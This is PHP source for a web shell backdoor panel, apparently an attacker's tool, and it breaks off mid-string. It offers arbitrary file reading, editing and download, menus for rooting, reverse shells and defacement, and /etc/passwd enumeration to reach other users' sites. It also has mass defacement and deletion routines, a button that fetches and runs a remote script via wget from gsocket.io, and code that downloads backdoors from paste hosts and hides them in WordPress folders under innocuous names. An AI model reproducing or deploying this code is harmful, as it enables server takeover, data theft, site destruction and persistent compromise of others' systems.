function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}\xafunction set(a,c,p1,p2,p3,charset) {\xaif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\xaif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\xaif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\xaif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."x"]."');
d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."x"]."');
d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."x"]."');
d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."x"]."');
d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."x"]."');\xaif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}\xafunction g(a,c,p1,p2,p3,charset) {\xaset(a,c,p1,p2,p3,charset);\xad.mf.submit();\xa}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);\xavar params = 'ajax=true';\xafor(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\xasr('".addslashes($_SERVER["REQUEST_URI"])."', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();\xaelse if (window.ActiveXObject)\xareq = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {\xareq.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);\xa}
}\xafunction processReqChange() {\xaif( (req.readyState == 4) )
if(req.status == 200) {\xavar reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');\xavar arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}\xa</script>\xa<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>\xa<input type=hidden name=c>\xa<input type=hidden name=p1>
<input type=hidden name=p2>\xa<input type=hidden name=p3>
<input type=hidden name=charset>\xa</form>";$freeSpace=@diskfreespace($GLOBALS["cwd"]);$totalSpace=@disk_total_space($GLOBALS["cwd"]);$totalSpace=$totalSpace?$totalSpace:1;$release=@php_uname("r");$kernel=@php_uname("s");$explink="http://www.lolinez.com/?https://www.exploit-db.com/search?q=";if(strpos("Linux",$kernel)!==false){$explink.=urlencode("Linux Kernel ".substr($release,0,6));}else{$explink.=urlencode($kernel." ".substr($release,0,3));}if(!function_exists("posix_getegid")){$user=@get_current_user();$uid=@getmyuid();$gid=@getmygid();$group="?";}else{$uid=@posix_getpwuid(@posix_geteuid());$gid=@posix_getgrgid(@posix_getegid());$user=$uid["name"];$uid=$uid["uid"];$group=$gid["name"];$gid=$gid["gid"];}$cwd_links='';$path=explode("/",$GLOBALS["cwd"]);$n=count($path);for($i=0;$i<$n-1;$i++){$cwd_links.="<a href='#' onclick='g("FilesMan","";for($j=0;$j<=$i;$j++){$cwd_links.=$path[$j]."/";}$cwd_links.="")'>".$path[$i]."/</a>";}$charsets=array("Windows-1251","UTF-8","KOI8-R","KOI8-U","cp866");$opt_charsets='';foreach($charsets as $asciifnc6){$opt_charsets.="<option value="".$asciifnc6."" ".($_POST["charset"]==$asciifnc6?"selected":'').">".$asciifnc6."</option>";}$m=array("Info"=>"SecInfo","Files"=>"FilesMan","Adminer"=>"Adminer","Deface"=>"Deface","Terminal"=>"Console","User"=>"Edituser","Cpanel"=>"Cpanel","Root"=>"AutoRoot","Jumping"=>"StringTools","Bypass"=>"bypas","Reverse"=>"reversephp","BC"=>"Network");if(!empty($GLOBALS["auth_pass5"])){$m["Logout"]="Logout";}$m["Kill"]="SelfRemove";$menu='';foreach($m as $k=>$v){$menu.="<th> <font color="#fff">- <a href="#" onclick="g('".$v."',null,'','','')">".$k."</a></font></th>";}$drives='';if($GLOBALS["os"]=="win"){foreach(range("c","z")as $drive){if(is_dir($drive.":\")){$drives.="<a href="#" onclick="g('FilesMan','".$drive.":/')">[ ".$drive." ]</a> ";}}}echo "<table class=infoo cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:".($GLOBALS["os"]=="win"?"<br>Drives:":'')."</span></td>"."<td><nobr>".substr(@php_uname(),0,120)." <a href="http://www.lolinez.com/?https://www.google.com/search?q=".urlencode(@php_uname())."" target="_blank" rel="nofollow noreferrer noopener">[ Google ]</a> <a href="".$explink."" target=_blank rel=nofollow noreferrer noopener>[ Exploit-DB ]</a></nobr><br>".$uid." ( ".$user." ) <span>Group:</span>&nbsp;&nbsp;&nbsp;".$gid." ( ".$group." )<br>".@phpversion()." <span>Safe mode:</span>&nbsp;&nbsp;&nbsp;".($GLOBALS["safe_mode"]?"<font color=red>ON</font>":"<font color=#ffffff><b>OFF</b></font>")." <a href=# onclick="g('Php',null,null,'info')">[ phpinfo ]</a> <span>Datetime:</span>&nbsp;&nbsp;&nbsp;".date("Y-m-d H:i:s")."<br>".viewSize($totalSpace)." <span>Free:</span>&nbsp;&nbsp;&nbsp;".viewSize($freeSpace)." (".round(100/($totalSpace/$freeSpace),2)."%)<br>".$cwd_links." ".viewPermsColor($GLOBALS["cwd"])." <a href=# onclick="g('FilesMan','".$GLOBALS["home_cwd"]."','','','')">[ home ]</a><br>".$drives."</td>"."<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">".$opt_charsets."</select></label><br><span>Server IP:</span><br>".gethostbyname($_SERVER["HTTP_HOST"])."<br><span>Client IP:</span><br>".$_SERVER["REMOTE_ADDR"]."</nobr></td></tr></table>"."<table style="background-color:#9c982e;" cellpadding=3 cellspacing=0 width=100%><tr>".$menu."</tr></table><div>";}goto cnbni;mPK0W:ini_set("html_errors",0);goto Zs2Nm;sgdrg:if(get_magic_quotes_gpc()){function stripslashes_array($array){return is_array($array)?array_map("stripslashes_array",$array):stripslashes($array);}$_POST=stripslashes_array($_POST);$_COOKIE=stripslashes_array($_COOKIE);}goto J5SK5;Jclr3:function actionAutoRoot(){hardHeader();echo "<center><h1>Auto Root</h1><div class=content><br>";echo "<br><center> <iframe frameBorder=0 src='?autor' width='800' height='450'></iframe></a></div>";hardFooter();}goto QAY2s;B09fV:function actionFilesTools(){if(isset($_POST["p1"])){$_POST["p1"]=urldecode($_POST["p1"]);}if(@$_POST["p2"]=="download"){if(@is_file($_POST["p1"])&&@is_readable($_POST["p1"])){ob_start("ob_gzhandler",4096);header("Content-Disposition: attachment; filename=".basename($_POST["p1"]));if(function_exists("mime_content_type")){$type=@mime_content_type($_POST["p1"]);header("Content-Type: ".$type);}else{header("Content-Type: application/octet-stream");}$fp=@fopen($_POST["p1"],"r");if($fp){while(!@feof($fp)){echo@fread($fp,1024);}fclose($fp);}}die;}if(@$_POST["p2"]=="mkfile"){if(!file_exists($_POST["p1"])){$fp=@fopen($_POST["p1"],"w");if($fp){$_POST["p2"]="edit";fclose($fp);}}}hardHeader();echo "<h1>File tools</h1><div class=content>";if(!file_exists(@$_POST["p1"])){echo "File not exists";hardFooter();return;}$uid=@posix_getpwuid(@fileowner($_POST["p1"]));if(!$uid){$uid["name"]=@fileowner($_POST["p1"]);$gid["name"]=@filegroup($_POST["p1"]);}else{$gid=@posix_getgrgid(@filegroup($_POST["p1"]));}echo "<span>Name:</span>&nbsp;&nbsp;&nbsp;".htmlspecialchars(@basename($_POST["p1"]))." <span>Size:</span>&nbsp;&nbsp;&nbsp;".(is_file($_POST["p1"])?viewSize(filesize($_POST["p1"])):"-")." <span>Permission:</span>&nbsp;&nbsp;&nbsp;".viewPermsColor($_POST["p1"])." <span>Owner/Group:</span>&nbsp;&nbsp;&nbsp;".$uid["name"]."/".$gid["name"]."<br>";echo "<span>Create time:</span>&nbsp;&nbsp;&nbsp;".date("Y-m-d H:i:s",filectime($_POST["p1"]))." <span>Access time:</span>&nbsp;&nbsp;&nbsp;".date("Y-m-d H:i:s",fileatime($_POST["p1"]))." <span>Modify time:</span>&nbsp;&nbsp;&nbsp;".date("Y-m-d H:i:s",filemtime($_POST["p1"]))."<br><br>";if(empty($_POST["p2"])){$_POST["p2"]="view";}if(is_file($_POST["p1"])){$m=array("View","Highlight","Download","Hexdump","Edit","Chmod","Rename","Touch","Frame");}else{$m=array("Chmod","Rename","Touch");}foreach($m as $v){echo "<a href=# onclick="g(null,null,'".urlencode($_POST["p1"])."','".strtolower($v)."')">".(strtolower($v)==@$_POST["p2"]?"<b>[ ".$v." ]</b>":$v)."</a> ";}echo "<br><br>";switch($_POST["p2"]){case "view":echo "<pre class=ml1>";$fp=@fopen($_POST["p1"],"r");if($fp){while(!@feof($fp)){echo htmlspecialchars(@fread($fp,1024));}@fclose($fp);}echo "</pre>";break;case "highlight":if(@is_readable($_POST["p1"])){echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">";$oRb=@highlight_file($_POST["p1"],true);echo str_replace(array("<span ","</span>"),array("<font ","</font>"),$oRb)."</div>";}break;case "chmod":if(!empty($_POST["p3"])){$perms=0;for($i=strlen($_POST["p3"])-1;$i>=0;--$i){$perms+=(int) $_POST["p3"][$i]*pow(8,strlen($_POST["p3"])-$i-1);}if(!@chmod($_POST["p1"],$perms)){echo "Can't set permissions!<br><script>document.mf.p3.value="";</script>";}}clearstatcache();echo "<script>p3_="";</script><form onsubmit="g(null,null,'".urlencode($_POST["p1"])."',null,this.chmod.value);return false;"><input type=text name=chmod value="".substr(sprintf("%o",fileperms($_POST["p1"])),-4).""><input type=submit value="submit"></form>";break;case "edit":if(!is_writable($_POST["p1"])){echo "File isn't writeable";break;}if(!empty($_POST["p3"])){$time=@filemtime($_POST["p1"]);$_POST["p3"]=substr($_POST["p3"],1);$fp=@fopen($_POST["p1"],"w");if($fp){@fwrite($fp,$_POST["p3"]);@fclose($fp);echo "Saved!<br><script>p3_="";</script>";@touch($_POST["p1"],$time,$time);}}echo "<form onsubmit="g(null,null,'".urlencode($_POST["p1"])."',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>";$fp=@fopen($_POST["p1"],"r");if($fp){while(!@feof($fp)){echo htmlspecialchars(@fread($fp,1024));}@fclose($fp);}echo "</textarea><input type=submit value="submit"></form>";break;case "hexdump":$c=@file_get_contents($_POST["p1"]);$n=0;$h=array("00000000<br>",'','');$len=strlen($c);for($i=0;$i<$len;++$i){$h[1].=sprintf("%02X",ord($c[$i]))." ";switch(ord($c[$i])){case 0:$h[2].=" ";break;case 9:$h[2].=" ";break;case 10:$h[2].=" ";break;case 13:$h[2].=" ";break;default:$h[2].=$c[$i];break;}$n++;if($n==32){$n=0;if($i+1<$len){$h[0].=sprintf("%08X",$i+1)."<br>";}$h[1].="<br>";$h[2].="\xa";}}echo "<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>".$h[0]."</pre></span></td><td bgcolor=#000000><pre>".$h[1]."</pre></td><td bgcolor=#202832><pre>".htmlspecialchars($h[2])."</pre></td></tr></table>";break;case "rename":if(!empty($_POST["p3"])){if(!@rename($_POST["p1"],$_POST["p3"])){echo "Can't rename!<br>";}else{die("<script>g(null,null,"".urlencode($_POST["p3"])."",null,"")</script>");}}echo "<form onsubmit="g(null,null,'".urlencode($_POST["p1"])."',null,this.name.value);return false;"><input type=text name=name value="".htmlspecialchars($_POST["p1"]).""><input type=submit value="submit"></form>";break;case "touch":if(!empty($_POST["p3"])){$time=strtotime($_POST["p3"]);if($time){if(!touch($_POST["p1"],$time,$time)){echo "Fail!";}else{echo "Touched!";}}else{echo "Bad time format!";}}clearstatcache();echo "<script>p3_="";</script><form onsubmit="g(null,null,'".urlencode($_POST["p1"])."',null,this.touch.value);return false;"><input type=text name=touch value="".date("Y-m-d H:i:s",@filemtime($_POST["p1"])).""><input type=submit value="submit"></form>";break;case "frame":$frameSrc=substr(htmlspecialchars($GLOBALS["cwd"]),strlen(htmlspecialchars($_SERVER["DOCUMENT_ROOT"])));if($frameSrc[0]!="/"){$frameSrc="/".$frameSrc;}if($frameSrc[strlen($frameSrc)-1]!="/"){$frameSrc=$frameSrc."/";}$frameSrc=$frameSrc.htmlspecialchars($_POST["p1"]);echo "<iframe frameBorder=0 width="100%" height="900px" scrolling="no" src=".$frameSrc." onload="onload=height=contentDocument.body.scrollHeight"></iframe>";break;}echo "</div>";hardFooter();}goto Rw6YU;qJRtx:ini_set("error_log",null);goto izs2B;zPNwz:function actionStringTools(){hardHeader();echo "<center><h1>Jumping :D</h1><div class=content><br>";$i=0;@ini_set("display_errors",0);echo "<pre><div class='margin: 5px auto;'>";$etc=fopen("/etc/passwd","r")or die("<font color=white>Can't read /etc/passwd</font>");while($passwd=fgets($etc)){if($passwd==''||!$etc){echo "<font color=white>Can't read /etc/passwd</font>";}else{preg_match_all("/(.*?):x:/",$passwd,$user_jumping);foreach($user_jumping[1]as $user_khoer_jump){$user_jumping_dir="/home/{$user_khoer_jump}/public_html";if(is_readable($user_jumping_dir)){$i++;$jrw="[<font color=white>R</font>] <a href='?path={$user_jumping_dir}'><font color=#fff>{$user_jumping_dir}</font></a>";if(is_writable($user_jumping_dir)){$jrw="[<font color=white>RW</font>] <a href='?path={$user_jumping_dir}'><font color=#fff>{$user_jumping_dir}</font></a>";}echo $jrw;if(function_exists("posix_getpwuid")){$domain_jump=file_get_contents("/etc/named.conf");if($domain_jump==''){echo " => ( <font color=white>I can't take the domain name</font> )<br>";}else{preg_match_all("#/var/named/(.*?).db#",$domain_jump,$domains_jump);foreach($domains_jump[1]as $dj){$user_jumping_url=posix_getpwuid(@fileowner("/etc/valiases/{$dj}"));$user_jumping_url=$user_jumping_url["name"];if($user_jumping_url==$user_khoer_jump){echo" => ( <u>{$dj}</u> )<br>";break;}}}}else{echo "<br>";}}}}}if($i==0){}else{echo "<br>Total ".$i." Directory ".gethostbyname($_SERVER["HTTP_HOST"]).'';}echo "</div></pre>";echo "</div>";hardFooter();}goto d0Oeq;rpdXp:function viewSize($s){if($s>=1073741824){return sprintf("%1.2f",$s/1073741824)." GB";}elseif($s>=1048576){return sprintf("%1.2f",$s/1048576)." MB";}elseif($s>=1024){return sprintf("%1.2f",$s/1024)." KB";}else{return $s." B";}}goto Ulmtn;M1Qpe:function viewPermsColor($f){if(!@is_readable($f)){return "<font color=red><b>".perms(@fileperms($f))."</b></font>";}elseif(!@is_writable($f)){return "<font color=red><b>".perms(@fileperms($f))."</b></font>";}else{return "<font color=#ffdb5f><b>".perms(@fileperms($f))."</b></font>";}}goto Bxufz;RSlVA:if(empty($_SESSION["keyxx"])){$keyxxx=generateRandomString();$_SESSION["keyxx"]=$keyxxx;}goto jJ2Wl;jAXHO:if($cwd[strlen($cwd)-1]!="/"){$cwd.="/";}goto HaRXp;sVdqn:if(isset($_REQUEST["mas"])){@ini_set("error_log",NULL);@ini_set("log_errors",0);@ini_set("max_execution_time",0);@ini_set("output_buffering",0);@ini_set("display_errors",0);echo "<center><form action="" method="post"> ";function edit_file($file,$index){if(is_writable($file)){clear_fill($file,$index);echo "<Span style='color:green;'><strong> [+] Done 100% Successfull </strong></span><br></center>";}else{echo "<Span style='color:red;'><strong> [-] Failed :( </strong></span><br></center>";}}function hapus_Massal($dir,$namafile){if(is_writable($dir)){$dira=scandir($dir);foreach($dira as $dirb){$dirc="{$dir}/{$dirb}";$lokasi=$dirc."/".$namafile;if($dirb==="."){if(file_exists("{$dir}/{$namafile}")){unlink("{$dir}/{$namafile}");}}elseif($dirb===".."){if(file_exists(''.dirname($dir)."/{$namafile}")){unlink(''.dirname($dir)."/{$namafile}");}}else{if(is_dir($dirc)){if(is_writable($dirc)){if(file_exists($lokasi)){echo"[<font color=red>DELETED</font>] {$lokasi}<br>";unlink($lokasi);$idx=hapus_Massal($dirc,$namafile);}}}}}}}function clear_fill($file,$index){if(file_exists($file)){$handle=fopen($file,"w");fwrite($handle,'');fwrite($handle,$index);fclose($handle);}}function gass(){global $dirr,$index;chdir($dirr);$me=str_replace(dirname(__FILE__)."/",'',__FILE__);$files=scandir($dirr);$notallow=array(".htaccess","www","Web.Config","UMD.php","Web.config","web.config","web.Config","..",".");sort($files);$n=0;foreach($files as $file){if($file!=$me&&is_dir($file)!=1&&!in_array($file,$notallow)){echo"<center><Span style='color: #8A8A8A;'><strong>{$dirr}/</span>{$file}</strong> ====> ";edit_file($file,$index);flush();$n=$n+1;}}echo "<br>";echo"<center><br><h3>{$n} Files Defaced </h3></center><br> ";}function ListFiles($dirrall){if($dh=opendir($dirrall)){$files=array();$inner_files=array();$me=str_replace(dirname(__FILE__)."/",'',__FILE__);$notallow=array($me,".htaccess","www","Web.Config","UMD.php","Web.config","web.config","web.Config");while($file=readdir($dh)){if($file!="."&&$file!=".."&&$file[0]!="."&&!in_array($file,$notallow)){if(is_dir($dirrall."/".$file)){$inner_files=ListFiles($dirrall."/".$file);if(is_array($inner_files)){$files=array_merge($files,$inner_files);}}else{array_push($files,$dirrall."/".$file);}}}closedir($dh);return $files;}}function gass_all(){global $index;$dirrall=$_POST["d_dir"];foreach(ListFiles($dirrall)as $key=>$file){$file=str_replace("//","/",$file);echo"<center><strong>{$file}</strong> ===>";edit_file($file,$index);flush();}$key=$key+1;echo"<center><br><h3>{$key} Files Defaced </h3></center><br>";}function sabun_Massal($dir,$namafile,$isi_script){if(is_writable($dir)){$dira=scandir($dir);foreach($dira as $dirb){$dirc="{$dir}/{$dirb}";$lokasi=$dirc."/".$namafile;if($dirb==="."){file_put_contents($lokasi,$isi_script);}elseif($dirb===".."){file_put_contents($lokasi,$isi_script);}else{if(is_dir($dirc)){if(is_writable($dirc)){echo"<font color=red>[ DONE ] </font><font color=white> {$lokasi}</font><br>";file_put_contents($lokasi,$isi_script);$idx=sabun_Massal($dirc,$namafile,$isi_script);}}}}}}if($_POST["Mass"]=="onedir"){echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\xa";$ini="http://";$mainpath=$_POST[d_dir];$file=$_POST[d_file];$dir=opendir("{$mainpath}");$code=base64_encode($_POST[script]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("{$row}/{$file}","w+");$finish=@fwrite($start,$indx);if($finish){echo"{$ini}{$row}/{$file}
";}}echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\xa";$mainpath=$_POST[d_dir];$file=$_POST[d_file];$dir=opendir("{$mainpath}");$code=base64_encode($_POST[script]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("{$row}/{$file}","w+");$finish=@fwrite($start,$indx);if($finish){echo "<a href="http://".$row."/".$file."" target="_blank">http://".$row."/".$file."</a><br>";}}}elseif($_POST["Mass"]=="sabunkabeh"){gass();}elseif($_POST["Mass"]=="hapusMassal"){hapus_Massal($_POST["d_dir"],$_POST["d_file"]);}elseif($_POST["Mass"]=="sabunmematikan"){gass_all();}elseif($_POST["Mass"]=="Massdeface"){echo "<div style='margin: 5px auto; padding: 5px'>";sabun_Massal($_POST["d_dir"],$_POST["d_file"],$_POST["script"]);echo "</div>";}else{echo "<style>input[type=submit].custom-tools-buttons{font-size:14px!important;padding:5px 10px!important;margin:0 5px!important;font-weight:700!important;cursor:pointer!important;color:#e1e1e1!important;background-color:#060a10!important;border:1px solid #9c982e!important}</style><font face='Open Sans' color='#fff' size='3' >Select Type:</font><br><select class="select" name="Mass"  style="width: 300px;  height="10" ><option value="onedir">Mass Deface 1 Dir</option>	<option value="Massdeface">Mass Deface ALL Dir</option><option value="sabunkabeh">Current Dir All Files</option>	<option value="sabunmematikan">Replace Everything With Deface</option><option value="hapusMassal">Mass Delete Files</option></select><br><font face='Open Sans' color='#fff' size='3' >Folder:</font><br><input name='d_dir' value='".getcwd()."' required='' type='text' style='width: 300px;  height='10'><br><font face='Open Sans' color='#fff' size='3' >Filename:</font><br><input type='text' name='d_file' value='index.html' style='width: 300px;  height='10'><br><font face='Open Sans' color='#fff'size='3' >index File:</font><br>
<textarea name='script' style='width: 650px; height: 200px;'></textarea><br>
<input type='submit' class='custom-tools-buttons' name='start' value='Mass Deface'></form></div>";}die;}goto ayxVY;cnbni:function hardFooter(){echo "<div style="margin:30px 20px;">";echo "<form method="post">";echo "<table style=background:#212832!important; class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>";echo "<thead><center><h3><strong>Custom Tools</strong></h3></center></thead>";echo "<tbody>";echo "<tr><td>";echo "<input class="custom-tools-buttons" type="submit" name="rungs" value="GS">";echo "<input class="custom-tools-buttons" type="submit" name="rungsc" value="GSC">";echo "<input class="custom-tools-buttons" type="submit" name="tebarwp" value="WP BD">";echo "<input class="custom-tools-buttons" type="submit" name="injectuploader" value="Uploader">";echo "<input class="custom-tools-buttons" type="submit" name="injectconsole" value="Console">";echo "<input class="custom-tools-buttons" type="submit" name="injectlogger" value="Logger">";echo "</tr></td>";echo "</tbody>";echo "</table>";echo "</form>";echo "<div style="margin:30px 20px;">";if(isset($_POST["rungs"])){echo"<div class="bigarea" name="output" style="border-bottom:0;margin-top:5px;" readonly><pre class=ml1>{$asciifnc7}".ex("bash -c "$(wget --no-check-certificate -qO- gsocket.io/x)"")."</pre></div>";}if(isset($_POST["rungsc"])){$url="https://res.cloudinary.com/dbassets/raw/upload/v1650572078/tool/google3f4e58d7b7552b00_jnq8uh.txt";$startDirectory=realpath(__DIR__);if($startDirectory!==$_SERVER["DOCUMENT_ROOT"]){$gschtml=$startDirectory."/google3f4e58d7b7552b00.html";}else{$gschtml=$_SERVER["DOCUMENT_ROOT"]."/google3f4e58d7b7552b00.html";}if(!file_exists($gschtml)){if(ini_get("allow_url_fopen")){$content=file_get_contents($url);$status=file_put_contents($gschtml,$content);if($status){echo "<div class="small" name="output" style="border-bottom:0;margin-top:5px;" readonly><span style=color:#20ef20!important;font-weight:bold;>Berhasil Upload File GSC!</span></div>";chmod($gschtml,292);}else{echo "<div class="small" name="output" style="border-bottom:0;margin-top:5px;" readonly><span style=color:red!important;font-weight:bold;>Can't Download GSC File!</span></div>";}}else{$fp=fopen($gschtml,"w+");$ch=curl_init($url);curl_setopt($ch,CURLOPT_FILE,$fp);curl_exec($ch);$st_code=curl_getinfo($ch,CURLINFO_HTTP_CODE);curl_close($ch);fclose($fp);if($st_code==200){echo "<div class="small" name="output" style="border-bottom:0;margin-top:5px;" readonly><span style=color:#20ef20!important;font-weight:bold;>Berhasil Upload File GSC!</span></div>";chmod($gschtml,292);}else{echo "<div class="small" name="output" style="border-bottom:0;margin-top:5px;" readonly><span style=color:red!important;font-weight:bold;>Can't Download GSC File!</span></div>";}}}else{echo "<div class="small" name="output" style="border-bottom:0;margin-top:5px;" readonly><span style=color:#20ef20!important;font-weight:bold;>File GSC Udah Ada!</span></div>";}}if(isset($_POST["tebarwp"])){$current_url=(isset($_SERVER["HTTPS"])&&$_SERVER["HTTPS"]==="on"?"https":"http")."://{$_SERVER["HTTP_HOST"]}{$_SERVER["REQUEST_URI"]}";$root_url=parse_url($current_url);$home=$root_url["scheme"]."://".$root_url["host"]."/";if(ob_get_level()==0){ob_start();}echo str_pad('',4096)."
";$startDirectory=realpath(__DIR__);$b1="https://res.cloudinary.com/dbassets/raw/upload/v1650567839/tool/alf1_skpkmz.txt";$b2="https://res.cloudinary.com/dbassets/raw/upload/v1650567893/tool/alf2_b9kpd8.txt";$b3="https://res.cloudinary.com/dbassets/raw/upload/v1650567930/tool/alf3_gx5vjo.txt";$b4="https://res.cloudinary.com/dbassets/raw/upload/v1650568228/tool/alf4_teokev.txt";$b5="https://res.cloudinary.com/dbassets/raw/upload/v1650568245/tool/alf5_bhvklm.txt";$b6="https://res.cloudinary.com/dbassets/raw/upload/v1650568261/tool/alf6_iurcrv.txt";$b7="https://snippet.host/pwxy/raw";$b8="https://res.cloudinary.com/dbassets/raw/upload/v1650569540/tool/wskagami_bwkxmw.txt";$b9="https://res.cloudinary.com/dbassets/raw/upload/v1650571065/tool/uploader_bfzehf.txt";$b10="https://dpaste.com/BUBSC2Y82.txt";$b11="https://snippet.host/zgsv/raw";$b12="https://res.cloudinary.com/dbassets/raw/upload/v1650567839/tool/alf1_skpkmz.txt";$b13="https://res.cloudinary.com/dbassets/raw/upload/v1650571065/tool/uploader_bfzehf.txt";$nama1="random_bytes_bcrypt.php";$nama2="Advance.php";$nama3="Directory.php";$nama4="random_compat.php";$nama5="Hostname.php";$nama6="class-wp-rest-get-controller.php";$nama7="outline.php";$nama8="site-plugins.php";$nama9="user-config.php";$nama10="meta-deprecated.php";$nama11="images-logo-favicon.php";$nama12="s3-1-1-477x400.php";$nama13="woocommerce-placeholder-300x300.php";$dir1=$_SERVER["DOCUMENT_ROOT"]."/wp-includes/random_compat/";if(!is_dir($dir1)){$dir1=$startDirectory."/wp-includes/random_compat/";mkdir($dir1,493,true);}$dir2=$_SERVER["DOCUMENT_ROOT"]."/wp-includes/Requests/Auth/";if(!is_dir($dir2)){$dir2=$startDirectory."/wp-includes/Requests/Auth/";mkdir($dir2,493,true);}$dir3=$_SERVER["DOCUMENT_ROOT"]."/wp-includes/sodium_compat/namespaced/";if(!is_dir($dir3)){$dir3=$startDirectory."/wp-includes/sodium_compat/namespaced/";mkdir($dir3,493,true);}$dir4=$_SERVER["DOCUMENT_ROOT"]."/wp-includes/sodium_compat/lib/";if(!is_dir($dir4)){$dir4=$startDirectory."/wp-includes/sodium_compat/lib/";mkdir($dir4,493,true);}$dir5=$_SERVER["DOCUMENT_ROOT"]."/wp-includes/PHPMailer/";if(!is_dir($dir5)){$dir5=$startDirectory."/wp-includes/PHPMailer/";mkdir($dir5,493,true);}$dir6=$_SERVER["DOCUMENT_ROOT"]."/wp-includes/rest-api/endpoints/";if(!is_dir($dir6)){$dir6=$startDirectory."/wp-includes/rest-api/endpoints/";mkdir($dir6,493,true);}$dir7=$_SERVER["DOCUMENT_ROOT"]."/wp-includes/Text/Diff/Renderer/";if(!is_dir($dir7)){$dir7=$startDirectory."/wp-includes/Text/Diff/Renderer/";mkdir($dir7,493,true);}$dir8=$_SERVER["DOCUMENT_ROOT"]."/wp-admin/network/";if(!is_dir($dir8)){$dir8=$startDirectory."/wp-admin/network/";mkdir($dir8,493,true);}$dir9=$_SERVER["DOCUMENT_ROOT"]."/wp-admin/user/";if(!is_dir($dir9)){$dir9=$startDirectory."/wp-admin/user/";mkdir($dir9,493,true);}$dir10=$_SERVER["DOCUMENT_ROOT"]."/wp-admin/includes/";if(!is_dir($dir10)){$dir10=$startDirectory."/wp-admin/includes/";mkdir($dir10,493,true);}$dir11=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/04/";if(!is_dir($dir11)){$dir11=$startDirectory."/wp-content/uploads/2022/04/";mkdir($dir11,493,true);}$dir12=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/01/";if(!is_dir($dir12)){$dir12=$startDirectory."/wp-content/uploads/2022/01/";mkdir($dir12,493,true);}$dir13=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/02/";if(!is_dir($dir13)){$dir13=$startDirectory."/wp-content/uploads/2022/02/";mkdir($dir13,493,true);}$finalbd1=$dir1.$nama1;$finalbd2=$dir2.$nama2;$finalbd3=$dir3.$nama3;$finalbd4=$dir4.$nama4;$finalbd5=$dir5.$nama5;$finalbd6=$dir6.$nama6;$finalbd7=$dir7.$nama7;$finalbd8=$dir8.$nama8;$finalbd9=$dir9.$nama9;$finalbd10=$dir10.$nama10;$finalbd11=$dir11.$nama11;$finalbd12=$dir12.$nama12;$finalbd13=$dir13.$nama13;$bdresult='';if(!file_exists($finalbd1)){if(ini_get("allow_url_fopen")){$bd1=file_get_contents($b1);$status_bd1=file_put_contents($finalbd1,$bd1);if($status_bd1){$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>Sukses!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd1."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd1."</a><br/>".PHP_EOL;chmod($finalbd1,292);}else{$altdir1=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/02/";if(!is_dir($altdir1)){$altdir1=$startDirectory."/wp-content/uploads/2022/02/";}$altdir1_final=$altdir1.$nama1;file_put_contents($altdir1_final,$bd1);chmod($altdir1_final,292);$bdresult.="<span style=color:red!important;font-weight:bold;>Gagal Taro Di Target! Akses di:</span>&nbsp;&nbsp;&nbsp;".$home.$altdir1_final."<br/>".PHP_EOL;}}}else{$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>File 